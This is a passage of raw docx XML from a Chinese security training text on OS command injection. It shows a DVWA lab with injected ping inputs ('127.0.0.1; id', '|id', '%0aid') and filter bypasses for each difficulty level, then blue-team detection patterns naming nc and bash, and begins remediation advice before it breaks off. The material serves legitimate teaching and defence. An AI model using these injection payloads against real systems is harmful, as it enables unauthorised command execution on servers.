        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">$cmd</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OtherTok"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">正常用户请求</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">?ip=127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">会执行</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping -c 4 127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。但若输入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1; id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，最终执行的命令变为：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping -c 4 127.0.0.1; id</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">后的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">作为独立命令执行，造成命令注入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">常见的命令分隔符（元字符）包括：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（命令顺序执行）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（后台执行，Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">与</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Unix </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">均适用）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（前一条成功才执行后一条）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（管道，将前一条输出传给后一条作为输入）、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（前一条失败才执行后一条）、反引号</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（命令替换）。不同操作系统</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对部分元字符的支持略有差异，但</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在多数场景下通用。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令注入的危害远超</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">注入：一旦在服务器上执行任意命令，攻击者可读取系统文件、反弹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">shell、横向移动、安装后门。该漏洞常见于网络工具参数（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">traceroute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nslookup</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）或系统维护功能中。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="178"/>
    <w:bookmarkStart w:id="179" w:name="靶机实操单元dvwa-命令注入"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">靶机实操单元：DVWA</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">目标靶机</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：DVWA（回指第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章搭建方式）。本节以低（Low）、中（Medium）、高（High）三个安全等级为例，逐步演示命令注入的利用与绕过，所有输出值均为占位表示。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Low </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">等级</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">操作：在输入框填入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1; id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，点击</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Submit。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象：返回</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ping</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输出后，额外显示当前用户身份，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=33(www-data) gid=33(www-data) groups=33(www-data)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（具体用户名因环境而异，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;USER&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">占位）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">排错：若未出现命令输出，检查目标系统是否启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">system</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">函数，或查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">服务器错误日志。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Medium </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">等级</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DVWA Medium </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对输入做了简单过滤，通常移除了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，但仍可用其他分隔符绕过。例如：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">输入：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 &amp; id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1 | id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Linux </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下仍可执行。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">预期现象：同上，但需注意某些</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或过滤可能拦截空格，可尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1|id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">排错：若</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">无效，可能是后台将其作为后台符号处理而未执行后续命令；可尝试</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1%0aid</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">（URL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码的换行符）作为命令分隔，某些</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">将其解释为命令分界。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">High </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">等级</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">DVWA High </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">加固了过滤规则，但通常仍存在逻辑缺陷：黑名单覆盖不完整或对大小写敏感。例如过滤了</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，但可能遗漏空格后的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">||</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，或可通过</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">编码</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">%7C</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">绕过。具体绕过方式因版本而异，此处仅作概念示意：防御方不应依赖黑名单，而应采用白名单。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">操作注意事项</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：所有试验仅限本地</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> DVWA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">容器，切勿针对任何未经授权的目标。使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等无害指令作为证明，不部署反弹</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或任何驻留后门。</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="179"/>
    <w:bookmarkStart w:id="180" w:name="防御对照框命令注入"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框（命令注入）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队检测</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">在</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">应用日志和系统审计日志中检查包含命令分隔符的异常请求，如出现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">;whoami</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">|id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">等字符串。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">监控服务器上非预期进程的创建，例如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Web </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">进程（www-data）突然派生</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">利用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> WAF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则检测常见命令注入模式，但注意规则可被绕过，不能作为根本防御。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">修复与加固</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">避免将用户输入拼接到操作系统命令中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">。如必须调用外部命令，应使用参数化</w:t>
      </w:r>
